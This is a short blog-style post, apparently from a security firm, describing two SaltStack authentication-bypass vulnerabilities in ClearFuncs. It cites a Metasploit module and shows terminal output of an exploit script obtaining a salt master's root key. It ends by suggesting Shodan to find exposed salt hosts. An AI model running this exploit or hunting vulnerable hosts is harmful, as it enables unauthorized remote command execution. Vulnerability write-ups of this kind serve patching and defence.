Hacking Salt Stack 2020

Hacking Salt Stack

Firo Solutions Hacking Salt image

Our exploit of today is one affecting two CVE’s for the popular devops tool salt.
Salt is a tool for system administrators to manage and carry out tasks on various computers.
Such as upgrading a large set of computers. Due to easy of use and a wide
variety of supported platforms the tool has grown a bigger and bigger user based and even has a
yearly conference called salt con(https://saltconf.com/).
Two new vulnerabilities was found that where so serious even salt is having
a text on their main page advising people to patch
their salt instance.


ClearFuncs, the part that is responsible for handling the
authentication and key exchange between a salt server
and client does not validate authentication when calling methods and functions.
This allows a malicious third party to use functions without any authentication.
This could be used to run and execute malicious commands on clients.

Check out ClearFuncs on github:


ClearFuncs is allowing arbitrary access to methods that can give
an unauthenticated user access to access system directories.


Metasploit(“metasploit-framework/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb”) was fast to write
a module that exploits these vulnerabilities


root@kalimah:~/salt# python3 exploit.py --master
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
[+] Salt version: 3000.1
[ ] This version of salt is vulnerable! Check results below
[+] Checking salt-master (ip:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651...
[*] root key obtained: b5pKEa3Mbp/TD7TjdtUTLxnk0LIANRZXC+9XFNIChUr6ZwIrBZJtoZZ8plfiVx2ztcVxjK2E1OA=

Find salt hosts:

shodan salt stack hosts